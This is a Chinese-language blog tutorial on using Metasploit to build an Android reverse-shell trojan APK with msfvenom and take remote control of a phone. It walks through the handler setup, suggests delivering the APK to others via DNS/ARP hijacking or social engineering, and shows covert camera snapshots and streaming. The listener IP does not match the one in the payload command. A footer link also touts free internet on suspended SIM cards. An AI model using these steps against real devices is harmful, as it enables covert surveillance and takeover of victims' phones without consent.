MSF入侵安卓手機 MSF又是什么
MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。
我這里做測試的系統(tǒng)是Backbox linux ,這是一款網(wǎng)絡滲透,信息安全評估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當然還有其它的 比如Kali linux 、Back Track這些等等。
環(huán)境:Backbox linux+MSF
目標:一臺安卓手機
既然是入侵安卓手機,肯定要先配置一個安卓木馬,那我們看看本機的IP

本機IP:192.168.1.6
在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木馬 現(xiàn)在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時候 會提示
msfpayload無法找到命令 所以使用msfvenom即可,這里LHOST 對應的是本機的IP地址 LPORT對應你要監(jiān)聽的端口 然后生成木馬的路徑

這樣我們就在/root/路徑下生成了一個APK的安卓木馬文件,至于木馬的免殺暫且不談。現(xiàn)在我們在來啟動MSF工具
輸入命令:msfconsole

然后輸入:
1. use exploit/multi/handler 加載模塊
2.set payload android/meterpreter/reverse_tcp 選擇Payload
3.show options 查看參數(shù)設置

我們看見payload里邊有兩個參數(shù)要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現(xiàn)在我們來更改設置
1.set LHOST 192.168.1.6 這里的地址設置成我們剛才生成木馬的IP地址
2.set LPORT 5555 這里的端口設置成剛才我們生成木馬所監(jiān)聽的端口
3.exploit 開始執(zhí)行漏洞 開始監(jiān)聽...

OK,一切準備工作準備就緒。?!,F(xiàn)在要做的就是把木馬文件搞到人家的手機上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件 就會下載我們的木馬文件
還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機上做測試



安裝完成后 會在桌面上生成一個MainActivity的程序圖標 這個就是我們剛才生成的木馬 當我們點擊了這個圖標 手機會沒有任何反應 其實木馬已經(jīng)開始運行起來了
我們可以在我們的MSF里看見有一個會話連接了

這樣對方的手機就就被我們控制了,查看手機系統(tǒng)信息,輸入命令 sysinfo


webcam_list查看手機攝影頭有幾個 這里顯示兩項 分別表示有前后兩個攝像頭

webcam_snap 隱秘拍照功能
后邊跟上參數(shù)-i 指定使用那個攝像頭拍照
可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上
還可以輸入命令webcam_stream 開啟攝像頭
其它的功能還有更多,以后再為大家依依介紹,希望這篇大家會喜歡。
相關文章
- 360手機安全中心接到大量用戶舉報,稱其遭受短信詐騙,被騙金額多數(shù)以萬計。最終都是因為用戶中招后,驗證碼被木馬偷偷轉發(fā)到不法分子手機中。2015-09-21
- 黑客入侵后要做的事就是上傳木馬后門,為了能夠讓上傳的木馬不被發(fā)現(xiàn),他們會想盡種種方法對其進行偽裝。而作為被害者,我們又該如何識破偽裝,將系統(tǒng)中的木馬統(tǒng)統(tǒng)清除掉呢2015-09-15
- 手機病毒是病毒的一個分支,雖然其存在只有短短數(shù)年,但在將來很可能會隨著3G的推廣而大量涌現(xiàn)。 病毒類型:手機病毒 病毒目的:破壞手機系統(tǒng),狂發(fā)短信等2009-06-28
- 手機停機一樣可以無限量免費上網(wǎng) 現(xiàn)在向大家透露一個如何激活已停機卡的方法!?激活了以后就可以免費上網(wǎng)了。注:《本人動感地帶的卡已測,通過》! 首先2009-06-28
- 騰訊公司在2009年5月7日上午9點推出全新的QQ安全中心,特別推出密保令牌服務。密保令牌是二代密保其中的一個密保手段,需要安裝在手機上,可以顯示6位動態(tài)密碼。當您成2009-06-28

